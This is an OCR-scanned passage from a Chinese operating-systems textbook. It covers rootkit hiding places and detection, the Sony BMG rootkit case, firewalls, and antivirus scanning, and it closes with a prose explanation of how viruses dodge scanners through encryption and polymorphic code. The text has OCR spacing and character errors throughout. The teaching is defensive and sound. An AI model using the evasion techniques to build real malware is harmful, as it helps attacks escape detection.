于 没有 任何 东西 隐藏 在 操作 系统 、 库 或 者 程序 中 ， 因 此 检查 这 些 地 方 的 rootkit 检 测 程序 就 显得 不 足 。 

3) 内 核 rootkit。 目前 最 常见 的 rootkit 感 染 操 作 系统 并 作为 驱动 程序 或 可 引导 内 核 模块 隐藏 于 其 中 。 
这 种 rootkit 可 以 轻松 地 将 一 个 大 而 复杂 且 频 繁 变化 的 驱动 程序 替换 为 一 个 新 的 驱动 程序 ， 这 个 新 的 驱动 
程序 既 包 含 原 驱动 程序 又 包含 rootkit。 

4) 库 rootkit。 另 一 个 rootkit 可 以 隐藏 的 地 方 是 系统 库 ， 如 Linux 中 的 libc。 这 种 位 置 给 恶意 软件 提供 
了 机 会 去 检查 系统 调用 的 参数 和 返回 值 ， 并 根据 自身 隐藏 的 需要 更 改 这 些 参数 和 返回 值 。 

5) 应 用 程序 rootkit。 另 一 个 隐藏 rotkit 的 地 方 是 在 大 的 应 用 程序 中 ， 尤 其 是 那些 在 运行 时 会 创建 很 多 新 文 
件 的 应 用 程序 中 〈 如 用 户 分 布 图 、 图 像 预览 等 )。 这 些 新 文件 是 隐藏 rootkit 的 好 地 方 ， 没有 人 会 怀疑 其 存在 。 

这 五 种 rootkit 可 以 隐藏 的 位 置 由 图 9-30 所 示 。 
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图 9-30 rootkit 可 以 隐藏 的 五 种 位 置 


2. rootkit 检 测 

当 硬件 、 操 作 系统 、 库 和 应 用 程序 不 能 被 信任 时 ，rootkit 很 难 被 检测 到 。 例 如 ， 一 种 查找 rootkit 的 
明显 方法 是 列举 磁盘 上 的 所 有 文件 ， 但 是 读 取 目 录 的 系统 调用 、 调 用 系统 调用 的 库 函 数 以 及 列表 程序 都 
有 潜在 的 恶意 性 ， 并 有 可 能 忽略 掉 与 rootkit 相 关 的 文件 。 然 而 情况 也 绝 非 无 可 救 药 。 

检测 一 个 引导 自己 的 管理 程序 并 在 其 控制 下 的 虚拟 机 中 运行 操作 系统 和 应 用 程序 的 rootkit 虽 然 难 以 
处 理 但 也 并 非 不 可 能 。 这 要 求 从 性 能 和 功能 上 仔细 检查 虚拟 机 和 实际 机 器 的 细微 差异 。Garfinkel 等 
(2007) 已 经 提出 了 一 些 这 样 的 差异 (如 下 所 述 ) ，Carpenter 等 (2007) 也 讨论 了 这 个 话题 。 

一 类 检测 方法 依赖 于 一 个 事实 : 管理 程序 自身 使 用 物理 资源 而 失去 这 些 资源 可 以 被 检测 到 。 例 如 ， 
管理 程序 需要 使 用 一 些 TLB 入 口 ， 在 这 些 稀 缺 资源 的 使 用 上 与 虚拟 机 产生 竞争 。rootkit 检 测 程序 可 以 向 
TLB 施 加 压力 ， 观 察 其 性 能 并 与 此 前 在 裸 机 上 测量 的 性 能 数据 进行 比较 。 

另 一 类 检测 方法 与 计时 相关 ， 尤 其 与 虚拟 输入 输出 设备 的 计时 相关 。 假 设 在 实际 机 器 上 读 出 一 些 PCI 
设备 寄存 器 需要 100 个 时 钟 周 期 ， 这 个 时 间 很 容易 重 现 。 在 一 个 虚拟 环境 下 ， 这 个 寄存 器 的 值 来 自 于 内 存 ， 
它 的 读 取 时 间 依 赖 于 它 到 底 在 CPU 一 级 缓存 、 二 级 缓存 还 是 实际 RAM 中 。 检 测 程序 可 以 轻易 地 强迫 其 在 这 
些 状态 之 间 来 回 移动 并 测量 实际 读 取 时 间 的 变化 。 注 意 我 们 关注 的 是 读 取 时 间 的 变化 而 非 实际 的 读 取 时 间 。 

另 一 个 可 以 被 探查 的 部 分 是 执行 特权 指令 的 时 间 ， 尤 其 是 对 那些 在 实际 硬件 上 只 需要 几 个 时 钟 周期 
而 在 被 模拟 时 需要 几 百 或 几 千 个 时 钟 周期 的 特权 指令 。 例 如 ， 如 果 读 出 某 个 被 保护 的 CPU 寄 存 器 在 实际 
硬件 环境 下 需要 1 纳 秒 ， 那 么 10 亿 次 软 中 断 和 模拟 绝 不 可 能 在 1 秒 内 完成 。 当 然 ， 管 理 程序 可 以 欺骗 报告 
模拟 时 间 而 不 报告 所 有 涉及 时 间 的 系统 调用 的 实际 时 间 ， 检 测 程 序 可 以 通过 连接 提供 精确 时 间 基准 的 远 
程 主机 或 网 站 来 绕 过 时 间 模 拟 。 因 为 检测 程序 只 需要 测量 时 间 间 隔 (例如 ， 执 行 10 亿 次 被 保护 寄存 器 的 
读 操作 需要 多 少时 间 ) ， 本 地 时 钟 和 远程 时 钟 的 偏 移 没有 关系 。 

如 果 没 有 管理 程序 被 塞 人 硬件 和 操作 系统 之 间 ， 那 么 rootkit 可 能 被 隐藏 在 操作 系统 中 。 很 难 通过 引 
导 计算 机 来 检测 其 存在 ， 因 为 操作 系统 是 不 可 信 的 。 例 如 ，rootkit 可 能 安装 大 量 的 文件 ， 这 些 文件 的 文 
件 名 都 由 “$$$_” 起 始 ， 当 读 取代 表 用 户 程序 的 目录 时 ， 不 报告 这 些 文件 的 存在 。 

在 这 样 的 环境 下 检测 rootkit 的 一 个 方法 是 从 一 个 可 信 的 外 部 介质 (如 CD-ROM/DVD 或 USB 棒 ) 引 
导 计 算 机 ， 然 后 磁盘 可 以 被 一 个 反 rootkit 程 序 扫描 ， 这 时 不 用 报 心 rootkit 会 干扰 这 个 扫描 。 另 一 个 选择 
是 对 操作 系统 中 的 每 个 文件 做 密码 散 列 ， 这 些 散 列 值 可 以 与 一 个 列表 中 的 散 列 值 进行 比较 ， 这 个 列表 在 
系统 安装 的 时 候 生 成 并 存储 于 系统 外 的 一 个 不 可 被 臭 改 的 位 置 。 如 果 没 有 预先 建立 这 些 散 列 值 ， 也 可 以 
由 安装 CD-ROM 或 DVD 即 时 计算 得 到 ， 或 由 被 比较 文件 自身 进行 计算 得 到 。 

库 和 应 用 程序 中 的 rootkit 更 难 隐藏 ， 当 操作 系统 从 一 个 外 部 介质 装 入 并 可 信 时 ， 这 些 库 和 应 用 程序 
的 散 列 值 也 可 以 与 已 知 为 正确 且 存储 与 CD-ROM 上 的 散 列 值 进行 比较 。 

到 目前 为 止 ， 我 们 讨论 的 都 是 被 动 rootkit， 它 们 不 会 干扰 检测 软件 。 还 存在 一 些 主动 rootkit， 它 们 
查找 并 破坏 检测 软件 或 至 少将 检测 软件 更 改 为 永远 报告 “NO ROOTKITS FOUND!”( 没 有 发 现 rootkit ), 
这 些 rootkit 要 求 更 复杂 的 检测 方法 。 幸 运 的 是 ， 到 目前 为 止 在 现实 环境 下 主动 rootkit 还 没有 出 现 。 

在 发 现 rootkit 后 应 该 做 什么 这 个 问题 上 存在 两 种 观点 。 一 种 观点 认为 系统 管理 员 应 该 像 处 理 癌症 的 
外 科 医 生 那 样 非常 小 心地 切除 它 。 另 一 种 观点 认为 尝试 移 除 rootkit 太 过 危险 ， 可 能 还 有 其 他 碎片 隐藏 在 
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其 他 地 方 ， 在 这 一 观点 下 ,惟一 的 解决 办 法 是 回复 到 上 一 个 已 知 干净 的 完整 备份 。 如 果 没 有 可 用 的 备份 ， 
就 要 求 从 原始 CD-ROM/DVD 进 行 新 的 安装 。 

3. Sony rootKit 

在 2005 年 ，Sony BMG 公司 发 行 了 一 些 包含 rootkit 的 音乐 CD。 这 被 Mark Russinovich (Windows 管 
理工 具 网 站 www.sysinternals.com 的 共同 创始 人 之 一 ) 发 现 ， 那 时 他 正在 开发 一 个 rootkit 检 测 工具 并 惊奇 
地 在 自己 的 系统 中 找到 了 一 个 rootkit。 他 在 自己 的 blog 中 写 下 了 这 件 事 ， 这 很 快 传 亡 了 各 大 媒体 和 互联 
网 。 一 些 科技 论文 与 此 相关 (Arnab 和 Hutchison, 2006; Bishop 和 Frincke, 2006; Felten 和 Halderman, 2006; 
Halderman 和 Felten, 2006;Levine et al.,2006)。 这 件 事 导致 的 黎 动 直到 好 几 年 以 后 才 逐 渐 停止 。 以 下 我 们 
对 此 事件 做 简单 的 描述 。 

当 用 户 插入 CD 到 一 个 Windows 系 统计 算 机 的 驱动 器 中 时 ，Windows 查 找 一 个 名 为 autorun.inf 的 文件 ， 
其 中 包含 了 一 系列 要 执行 的 动作 ， 通 常 包括 打开 一 些 CD 上 的 程序 (如 安装 向 导 )。 正 常情 况 下 ， 音 乐 
CD 没有 这 些 文件 因为 即便 它们 存在 也 会 被 单机 CD 播放 器 忽略 。 显 然 Sony 的 某 个 天 才 认为 他 可 以 聪明 地 
通过 放置 一 个 autorun.inf 文 件 在 一 些 CD 上 来 防止 音乐 盗版 。 当 这 些 CD 插 入 计算 机 时 ， 就 会 立即 安静 地 
安装 一 个 12MB 大 小 的 rootkit。 然 后 一 个 许可 协议 被 显示 ， 其 中 没有 提 到 任何 关于 软件 被 安装 的 信息 。 
在 显示 许可 的 同时 ，Sony 的 软件 检查 是 否 有 200 种 已 知 的 复制 软件 中 的 任 一 种 正在 运行 ， 如 果 有 的 话 就 
命令 用 户 停止 这 些 复制 软件 。 如 果 用 户 同意 许可 协议 并 关闭 了 所 有 的 复制 软件 ， 音 乐 将 可 以 播放 ， 否 则 
音乐 就 不 能 播放 。 即 使 用 户 拒绝 协议 ，rootkit 仍 然 被 安装 。 

这 个 rootkit 的 工作 方法 如 下 。 它 向 Windows 内 核 插 入 一 系列 文件 名 由 “$sys$” 起 始 的 文件 。 这 些 文 
件 之 一 是 一 个 过 滤器 ， 这 个 过 滤器 截取 所 有 向 CD-ROM 驱 动 器 的 系统 调用 并 禁止 除 Sony 的 音乐 播放 器 之 
外 的 所 有 程序 读 取 CD。 这 一 动作 使 得 复制 CD 到 硬盘 (这 是 合法 的 ) 变 得 不 可 能 。 另 一 个 过 滤器 截取 所 
有 读 取 文件 、 进 程 和 注册 表 列表 的 调用 ， 并 删除 所 有 由 “$sys$S” 起 始 的 项 (即便 这 些 项 是 由 与 Sony 和 
音乐 都 完全 无 关 的 程序 而 来 的 )， 目 的 是 为 了 掩盖 rootkit。 这 一 方法 对 于 rootkit 设 计 新 手 来 说 非常 标准 。 

在 Russinovich 发 现 这 一 rootkit 之 前 ， 它 已 经 被 广泛 地 安装 ， 这 完全 不 令 人 惊讶 ， 因 为 在 超过 2000 万 
张 CD 上 包含 此 rootkit。Dan Kaminsky (2006) 研究 了 其 广度 并 发 现 全 世界 超过 50 万 个 网 络 中 的 计算 机 
已 经 被 感染 。 

当 消 息 传 出 时 ，Sony 的 第 一 回应 是 它 有 权 保 护 其 知识 产权 。 在 National Public Radio 的 一 次 采访 中 ， 
Sony BMG 的 全 球 数字 业务 主席 Thomas Hesse 说 :“ 我 认为 绝 大 多 数 人 其 至 不 知道 什么 是 rootkit， 那 么 他 
们 何必 那么 在 意 它 ?” 当 这 一 回应 激 起 了 公众 怒火 时 ，Sony 让 步 并 发 行 了 一 个 补丁 来 移 除 对 “$sys$” 
文件 的 掩盖 ， 但 仍 保留 rootkit。 随 着 压力 的 增加 ，Sony 最 终 在 其 网 站 上 发 布 了 一 个 卸载 程序 ， 但 作为 获 
得 仓 载 程序 的 条 件 ， 用 户 必须 提供 一 个 E-mail 地 址 并 同意 Sony 可 以 在 以 后 向 他 们 发 送 宣传 材料 这些 可 
以 被 大 多 数 人 过 滤 掉 ) 。 

随 着 故事 的 终结 ， 人 们 发 现 Sony 的 卸载 程序 存在 技术 缺陷 ， 使 得 被 感染 的 计算 机 非常 容易 遭受 互联 
网 上 的 攻击 。 人 们 还 发 现 该 rootkit 包 含 了 从 开源 项 目 而 来 的 代码 ， 这 违反 了 这 些 开源 项 目的 著作 权 (这 
些 开源 项 目的 著作 权 要 求 对 其 软件 的 免费 使 用 也 发 布 源 代码 )。 

除了 空前 的 公众 关系 灾难 之 外 ，Sony 也 面临 着 法 律 危机 。 德 克 萨 斯 州 控告 Sony 违 反 了 其 反 间 谍 软 
件 法 以 及 欺诈 性 贸易 惯例 法 (因为 即使 许可 被 拒绝 rootkit 仍 然 会 被 安装 )。 此 后 在 39 个 州都 提起 了 公诉 。 
在 2006 年 12 月 ， 在 Sony 同 意 支付 425 万 美元 、 同 意 停止 在 其 未 来 的 CD 中 放 入 rootkit 并 授权 每 位 受害 者 可 
以 下 载 一 个 有 限 的 音乐 目录 下 的 三 张 专辑 之 后 ， 这 些 诉讼 得 以 解决 。 在 2007 年 1 月 ，Sony 承 认 其 软件 秘 
密 监 视 用 户 的 收听 习惯 并 将 其 报告 回 Sony 也 违反 了 美国 法 律 。 在 与 公平 贸易 委员 会 (FTC) 的 协议 中 ， 
Sony 同 意 支 付 那些 计算 机 遭 到 其 软件 破坏 的 用 户 150 美 元 的 补偿 。 

关于 Sony 的 rootkit 的 故事 已 经 为 每 一 位 曾经 认为 rootkit 只 是 学 术 上 的 稀奇 事物 而 与 现实 世界 无 关 的 
读者 提供 了 实例 。 在 互联 网 上 搜索 “Sony rootkit” 会 发 现 大 量 补充 信息 。 


9.8 防御 


面 对 危机 四 伏 的 状况 ， 那 么 还 有 确保 系统 安全 的 可 能 吗 ? 当然， 是 有 的 ， 下 面 的 小 节 要 介绍 一 下 几 
种 设计 和 实现 系统 的 方法 来 提高 它们 的 安全 性 。 一 个 最 重要 的 概念 就 是 全 面 防御 (defense in depth), 
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基本 地 讲 ， 这 个 概念 是 指 你 必须 有 多 层 的 安全 性 ， 以 便于 当 其 中 的 一 层 被 破坏 ， 仍 然 还 有 其 他 层 要 去 防 
御 。 想 象 一 下 这 样 的 一 个 房子 ， 有 一 个 高 的 带 钉 子 的 关闭 着 的 铁 桶 栏 ， 在 院子 里 有 运动 检测 器 ， 前 门 上 
有 两 把 做 工 精良 的 锁 ， 屋 子 里 还 有 一 个 计算 机 控制 的 盗窃 报警 系统 。 每 一 个 技术 自己 本 身 都 是 有 价值 的 ， 
为 了 间 入 这 个 房子 盗贼 需要 打败 所 有 的 防御 。 一 个 安全 的 计算 机 系统 就 应 该 像 这 个 房子 一 样 ， 有 着 多 层 
的 安全 性 。 我 们 将 要 介绍 其 中 的 某 些 层 次 。 防 御 不 是 真 的 分 等 级 的 ， 而 是 我 们 要 从 一 般 的 外 部 的 东西 开 
始 ， 然 后 逐渐 深入 到 细节 。 


9.8.1 防火 墙 

能 够 把 任何 地 方 的 一 台 计 算 机 连接 到 其 他 一 台 任何 地 方 的 计算 机 上 是 一 件 好 坏 参半 的 事情 。 网 络 上 
有 很 多 有 价值 的 资料 ， 但 是 同时 连接 到 Internet 上 也 使 我 们 的 计算 机 面临 着 两 种 危险 : 来 自 外 部 和 来 自 内 
部 。 来 自 外 部 的 危险 包括 黑客 、 病 毒 、 间 谍 软件 以 及 其 他 的 恶意 软件 。 来 自 内 部 的 危险 包括 了 机 密 信 息 
泄露 ， 比 如 信用 卡号 、 密 码 、 纳 税 申请 单 和 各 种 各 样 的 公司 信息 。 

因此 ， 我 们 需要 某 种 机 制 来 保证 “好 ”的 留 下 来 并 且 阻止 “ 坏 ” 的 进入 。-- 种 方法 是 使 用 防火 墙 
(firewall) ， 它 是 一 种 中 世纪 十 老 的 安全 措施 的 现代 版 本 : 在 你 的 城堡 周围 挖 一 条 护城河 。 这 样 的 设计 强 
制 每 一 个 进入 或 者 离开 城堡 的 人 都 要 经 过 惟一 的 一 座 吊桥 ， IO 警察 可 以 在 吊桥 上 检查 每 一 个 经 过 的 人 。 
对 于 网 络 ， 这 种 方 靶 也 是 可 行 的 : 一 个 公司 可 能 有 很 多 的 任意 连接 的 局 域 网 ， 但 是 所 有 进入 或 离开 公司 
的 网 络 流 都 要 强制 地 通过 一 个 电子 吊桥 一 一 防 火 墙 。 

防火 墙 有 两 种 基本 的 类 型 ;硬件 防火 墙 和 软件 防火 墙 。 有 局 域 网 需要 保护 的 公司 通常 选择 硬件 防火 
墙 ， 而 家 庭 的 个 人 用 户 通常 会 选择 软件 防火 墙 。 首 先 ， 让 我 们 看 一 看 硬件 防火 墙 。 一 般 的 硬件 防护 墙 如 
图 9-31 所 示 。 在 该 图 中 ， 来 自 网 络 提供 者 的 连接 (电缆 或 光纤 ) 会 被 插 到 防火 墙 上 ， 防火 墙 也 连接 到 局 域 
网 上 。 不 经 过 防火 墙 的 允许 任何 包 都 不 能 进入 或 者 离开 局 域 网 。 实 际 的 情况 下 ， 防护 墙 通常 会 和 路 由 器 、 
网 络 地 址 转换 盒 、 指 令 检查 系统 和 其 他 设备 联合 起 来 工作 ， 但 是 在 这 里 我 们 只 关注 于 防火 墙 自身 的 功能 。 


207.68.160.190:80 207.68.160.191:25 207.68.160.192:21 
Web E-mail 


FTP 
т е 服务 器 服务 器 服务 器 


网 络 连接 а 


局 域 网 
图 9-31 一 个 由 防火 墙 保护 的 局 域 网 示意 图 ( 含 三 台 主 机 ) 


防火 墙根 据 一 些 规则 来 配置 ， 这 些 规则 描述 什么 是 允许 的 ， 什么 是 不 允许 的 。 防 护 墙 的 管理 者 可 以 
修改 这 些 规则 ,通常 修改 是 通过 一 个 Web 界 面 进行 的 (大 多 数 防 火 墙 都 内 置 一 个 小 型 Web 服 务 器 来 实现 它 )。 
最 简单 的 一 种 防护 墙 是 无 状态 防护 墙 (stateless firewall), 只 会 检查 通过 的 包 的 头 部 ， 然 后 根据 包头 部 的 
信息 和 防火 墙 的 规则 作出 传送 还 是 丢弃 这 个 包 的 决定 。 包头 部 的 信息 包括 源 和 目的 的 IP 地 址 、 源 和 目的 
的 端口 、 服 务 的 类 型 和 协议 。 包 头 部 的 其 他 属性 也 是 可 以 得 到 的 ， 但 是 很 少 会 被 防火 墙 的 规则 涉及 。 

在 图 9-31 中 ， 我 们 有 3 个 服务 器 ， 每 一 个 都 有 一 个 惟一 的 IP 地 址 ， 形 如 207.68.160.x， 其 中 x 依次 是 
190、191、192。 这 三 个 地 址 就 是 那些 要 发 送 给 这 些 服务 器 的 包 的 目的 地 址 。 进来 的 包 同 时 也 包含 一 个 
16 位 的 端口 号 (port number), 来 描述 机 器 上 哪 一 个 进程 来 获得 这 个 包 (一 个 进程 能 监听 一 个 来 自 外 部 
网 络 流量 的 端口 )。 一 些 端口 是 和 一 些 标准 服务 联系 在 一 起 的 。 特 别 地 ， 端口 80 被 web 使用， 端口 25 被 
E-mail 使 用 ， 端 口 21 被 FTP (文件 传输 协议 ) 服务 使 用 ， 但 是 大 多 数 其 他 的 端口 是 被 用 户 定义 的 服务 使 
用 的 。 在 这 样 的 条 件 下 ， 防 火 墙 可 能 按照 如 下 规则 配置 ; 


人 地址 端口 动作 
207.68.160.190 80 Accept | 
207.68.160.191 25 Accept 
207.68.160.192 21 Accept 
* * Deny 
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这 些 规则 只 有 当 包 被 发 送 到 端口 80 的 时 候 ， 才 会 允许 进入 地 址 是 207.68.160.190 的 机 器 ， 这 个 机 器 
的 其 他 端口 都 是 被 禁止 的 并 且 发 送 给 这 些 端口 的 包 都 会 被 防火 墙 自动 丢弃 。 同 样 ， 只 有 发 送 给 端口 25 和 
21 的 包 才 可 以 进入 其 他 两 个 机 器 。 所 有 其 他 的 网 络 流 都 是 禁止 的 。 这 个 规则 集 使 得 攻击 者 除了 提供 的 三 
个 公共 的 服务 以 外 ， 很 难 访问 到 局 域 网 。 

虽然 有 了 防火 墙 ， 局 域 网 还 是 可 能 会 受到 攻击 。 例 如 ， 如 果 Web 服 务 器 是 Apache 并 且 攻 击 者 找到 了 
一 个 可 以 利用 的 Apache 的 bug， 那 么 他 可 以 发 送 一 个 很 长 的 URL 到 207.68.160.190 的 端口 80， 然 后 制造 一 
个 缓冲 区 溢出 ， 进 而 控制 由 防火 墙 保护 的 一 台 机 器 ， 通 过 这 个 机 器 可 以 发 动 对 局 域 网 内 其 他 机 器 的 攻击 。 

另 一 种 潜在 的 攻击 是 写 一 个 多 人 游戏 ， 发 布 这 个 游戏 并 且 让 它 得 到 广泛 的 接受 。 这 个 游戏 的 软件 需 
要 某 个 端口 来 和 其 他 的 玩家 联系 ， 所 以 游戏 设计 者 会 选择 一 个 端口 ， 比 如 9876， 并 且 告 诉 玩家 来 改变 防 
火 墙 的 设置 ， 来 允许 在 这 个 端口 网 络 流 的 进出 。 打 开端 口 的 人 现在 也 容易 受到 这 个 端口 上 的 攻击 。 即 使 
这 个 游戏 是 合法 的 ， 那 么 它 也 可 能 包含 一 些 可 以 利用 的 bug。 打 开 越 多 的 端口 ， 被 成 功 攻击 的 机 会 就 越 
大 。 防 火 墙 上 的 每 一 个 端口 都 增加 了 攻击 通过 的 可 能 。 

除了 无 状态 防火 墙 以 外 ， 还 有 一 种 跟踪 连接 以 及 连接 状况 的 防火 墙 。 这 些 防火 墙 能 够 更 好 地 防止 某 
些 类 型 的 攻击 ， 特 别 是 那些 和 建立 连接 有 关 的 攻击 。 另 外 ， 一 些 其 他 类 型 的 防火 墙 实现 了 入 侵 检测 系统 
(Intrusion Detection System，IDS)， 利 用 IDS 防 火 墙 不 仅 可 以 检测 包 的 头 部 还 可 以 用 检测 包 的 内 容 来 查 
找 可 疑 的 内 容 。 

软件 防火 墙 ， 有 时 也 叫做 个 人 防火 墙 ， 和 硬件 防火 墙 具有 同样 的 功能 ， 只 不 过 是 通过 软件 方式 实现 
的 。 它 们 是 附加 在 操作 系统 内 核 的 网 络 代码 上 的 过 滤器 ， 是 和 硬件 防火 墙 工作 机 制 一 样 的 过 滤 数 据 包 。 


982 反 病 毒 和 抑制 反 病毒 技术 

正如 上 文 所 提 到 的 ， 防 火 墙 会 尽量 地 阻止 人 侵 者 进入 电脑 ， 但 是 在 很 多 情况 下 防火 墙 会 失败 。 在 这 
种 情况 下 ， 下 一 道 防线 是 由 反 恶 总 软件 的 程序 (antimalware program) 组 成 的 。 尽管 这 种 反 恶 意 软件 的 
程序 同样 可 以 对 抗 蠕虫 和 间谍 软件 ， 但 是 它们 通常 称 做 反 病毒 程序 (antivirus program)。 病 毒 尽量 地 隐 
藏 自 己 ， 而 用 户 则 是 努力 地 发 现 它们 ， 这 就 像 是 一 个 猫 所 老鼠 的 游戏 。 在 这 方面 ， 病 毒 很 像 rootkit， 不 
同 的 地 方 是 病毒 的 制造 者 更 强调 的 是 病毒 的 传播 速度 而 不 是 像 rookit 一 样 注重 于 捉迷藏 。 现 在 ， 让 我 们 
来 看 看 反 病毒 软件 所 使 用 的 技术 ， 以 及 病毒 的 制造 者 Virgil 是 怎么 应 对 这 些 技术 的 。 

1. 病毒 扫描 器 

显然 ， 一 般 用 户 没有 去 查找 竭尽 全 力 茂 身 的 大 多 数 病毒 ， 所 以 市 场 上 出 现 了 反 病毒 软件 。 下 面 我 们 
将 讨论 一 下 反 病毒 软件 的 工作 原理 。 反 病毒 软件 公司 拥有 一 流 的 实验 室 ， 在 那里 许多 专家 长 时 间 地 跟踪 
并 研究 不 断 涌现 出 的 新 病毒 。 第 一 步 是 让 病毒 感染 不 执行 任何 操作 的 程序 ， 这 类 程序 叫做 诱饵 文件 ， 然 
后 获取 病毒 的 完整 内 容 。 下 一 步 是 列 出 病毒 的 完全 代码 表 把 它 输入 已 知 病毒 的 数据 库 。 公司 之 间 为 其 数 
据 库 的 容量 而 竞争 。 发 现 新 的 病毒 就 放 到 数据 库 中 与 体育 竞赛 是 完全 不 同 的 。 

一 旦 反 病毒 软件 安装 在 用 户 的 计算 机 里 ， 第 一 件 事 就 是 在 硬盘 里 扫描 所 有 可 执行 文件 ， 看 看 是 否 能 
发 现 病毒 库 里 已 知 的 病毒 。 大 多 数 反 病毒 公司 都 建 有 网 站 ， 从 那里 客户 可 以 下 载 新 发 现 病毒 的 特征 码 到 
自己 的 病毒 库 里 。 如 果 用 户 有 10 000 个 文件 ， 而 病毒 库 里 有 10 000 种 病毒 ， 当然 需要 一 些 高 效 的 代码 使 
得 程序 得 以 更 快 地 运行 。 

由 于 有 些 已 知 病毒 总 是 在 不 断 发 生 细微 变化 ， 所 以 人 们 需要 一 种 模糊 查询 软件 ， 这 样 即便 3 个 字 节 
的 改变 也 不 会 让 病毒 逃避 检测 。 但 是 ， 模 糊 查询 不 仅 比 正常 查询 慢 ， 而 且 容易 导致 错误 报警 ( 误 测 )。7 
年 前 在 巴基斯坦 ， 有 些 合法 的 文件 恰巧 包含 了 与 病毒 代码 极为 相像 的 字符 ， 结果 导致 了 病毒 报警 。 用 户 
这 时 往往 会 看 到 下 面 的 信息 : 

WARNING! File xyz.exe may contain the lahore-9x virus. Delete? 

数据 库 里 的 病毒 越 多 ， 扫 描 标准 越 宽松 ， 误 报警 的 可 能 性 就 越 大 。 如 果 出 现 了 太 多 的 误 报警 ， 用 户 
会 因为 厌烦 而 放弃 使 用 。 但 是 如 果 病毒 扫描 器 坚持 严格 匹配 病毒 码 ， 它 就 会 错过 许多 变形 病毒 。 解 决 办 
法 是 要 达到 一 种 微妙 的 平衡 ， 完 美的 扫描 软件 应 该 识别 病毒 的 核心 代码 ， 这 些 核心 代码 不 会 轻易 改变 ， 
从 而 能 够 作为 病毒 的 特征 签名 来 查找 。 

由 于 磁盘 里 的 文件 上 周 被 宣布 无 病毒 感染 后 并 不 意味 着 现在 仍 未 被 感染 ， 所 以 人 们 需要 经 常 使 用 病 
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毒 扫描 。 因 为 扫描 速度 很 慢 ， 所 以 要 保持 效率 就 应 该 仅 对 上 次 扫描 后 被 改动 的 文件 进行 检查 。 但 是 ， 陪 
明 的 病毒 会 把 感染 过 的 文件 日 期 重 置 为 初始 日 期 以 逃避 检验 。 于 是 ， 反 病毒 程序 修改 校 验 文件 所 在 目录 
的 日 期 。 但 是 病毒 接着 又 把 目录 的 日 期 也 改 掉 。 这 就 像 我 们 上 面 所 提 到 的 猫 捉 老鼠 游戏 一 样 。 

反 病 毒 软件 的 另 一 种 方法 是 检测 文件 ， 记 录 和 存放 所 有 文件 的 长 度 。 如 果 一 个 文件 自 上 周 以 来 突然 
增加 了 许多 ， 就 有 可 能 被 感染 ， 如 图 9-32a 所 示 。 但 是 ， 聪 明 的 病毒 可 通过 程序 压缩 原 有 文件 并 将 其 填 
充 到 原 有 长 度 来 逃避 检查 。 要 使 这 种 方法 奏效 ， 病 毒 必须 还 要 包含 压缩 和 解压 缩 过 程 ， 如 图 9-32c 所 示 。 


文件 变 长 
病毒 原 有 长 度 原 有 长 度 
加 密 过 程 

可 执行 可 执行 
程序 程序 

被 压缩 的 可 被 压缩 的 可 

执行 程序 执行 程序 
文件 头 文件 头 文件 头 文件 头 


а) b) c) 


199-32 а) 一 段 程序 ，b) 已 感染 的 程序 ，c) 被 压缩 的 已 感染 程 序 ， 
由 加 密 的 病毒 ，e) 带 有 加 密 压缩 代码 的 压缩 病毒 


病毒 还 有 一 种 逃避 检测 办 法 , 那 就 是 让 自己 在 磁盘 里 呈现 出 的 特征 与 病毒 数据 库 里 的 特性 不 尽 相 同 。 
要 达到 这 一 目标 ， 方 法 之 一 是 每 感染 一 个 文件 就 用 不 同 的 密 钥 将 自身 加 密 。 在 复制 新 的 病毒 体 之 前 ， 病 
毒 先 随机 产生 一 个 32 位 的 加 密 密 钥 ， 如 将 当前 时 间 与 内 存 里 诸如 72 008 和 319 992 等 数字 进行 异 或 。 然 后 
将 病毒 代码 与 这 一 密 钥 逐 字 节 地 异 或 ， 加 密 后 的 结果 值 储存 在 被 感染 文件 中 ， 如 图 9-32d 所 示 。 密 钥 也 
同时 存放 在 文件 中 。 从 保密 性 角度 来 说 ， 把 密 钥 放 进 文件 是 不 明智 的 。 这 样 做 的 目的 无 非 是 为 了 对 付 病 
毒 扫描 ， 但 却 不 能 防止 专家 在 反 病毒 实验 室 里 逆向 破解 出 病毒 代码 。 当 然 ， 病 毒 在 运行 时 必须 首先 对 自 
已 解 密 ， 所 以 在 文件 里 也 同时 需要 解密 过 程 。 

上 述 策略 实际 上 并 不 完善 ， 因 为 压缩 、 解 压缩 、 加 密 和 解密 等 过 程 在 复制 每 个 病毒 体 时 都 是 一 样 的 ， 
反 病 毒 软件 可 以 利用 这 一 特征 来 查 杀 病毒 。 把 压缩 、 解 压缩 和 加 密 过 程 隐藏 起 来 较为 容易 : 只 要 对 它们 
加 密 并 存放 在 病毒 体 里 ， 如 图 9-32e 所 示 。 但 是 ， 解 密 过 程 不 能 被 加 密 ， 它 必须 运行 在 硬件 上 以 便 将 病毒 
体 的 其 余部 分 解密 ， 所 以 必须 用 明文 格式 存放 。 反 病毒 软件 当然 知道 这 些 ， 所 以 它们 专门 搜索 解密 过 程 。 

然而 ，Virgil 喜 欢笑 到 最 后 ， 所 以 他 采用 了 下 面 的 步骤。 假设 解密 过 程 需要 进行 如 下 运算 ; 

X=(A+B+C-4) 


在 普通 的 双 地 址 计算 机 上 可 以 运用 汇编 语言 编写 该 运算 ， 如 图 9-33a 所 示 。 第 一 个 地 址 是 源 地 址 ， 
第 二 个 地 址 是 目标 地 址 ， 所 以 MOV A，R1 是 把 变量 4 放 入 寄存 器 R1 中 。 图 9-33b 的 代码 也 是 同样 的 意思 ， 
不 同 之 处 仅仅 在 于 代码 中 插入 了 NOP (无 操作 ) 指令 而 降低 了 效率 。 

现在 整个 编码 工作 还 未 完成 。 为 了 伪装 解密 代码 ， 可 以 用 许多 方法 来 替代 NOP。 例 如 ， 把 0 加 入 寄 
存 器 、 自 身 异 或 、 左 移 0 位 、 跳 转 到 下 一 个 指令 等 ， 所 有 的 都 不 做 任何 操作 。 所 以 ， 图 9-33c 在 功能 上 与 
图 9-33a 是 相同 的 。 当 病毒 复制 自身 时 ， 往 往 采用 图 9-33c 的 代码 而 不 是 图 9-33a， 这 样 在 日 后 运行 时 还 能 
工作 。 这 种 每 次 复制 时 都 发 生变 异 的 病毒 叫做 多 形态 病毒 (polymorphic virus) 。 

现在 假设 在 这 段 代码 里 不 再 需要 R5 寄 存 器 。 也 就 是 说 ， 图 9-33d 与 图 9-33a 的 功能 一 致 。 最 后 ， 在 许 
多 情况 下 ， 可 以 交换 指令 而 不 会 改变 程序 功能 ， 我 们 用 图 9-33e 作 为 另 一 种 与 图 9-33a 在 逻辑 上 保持 一 至 
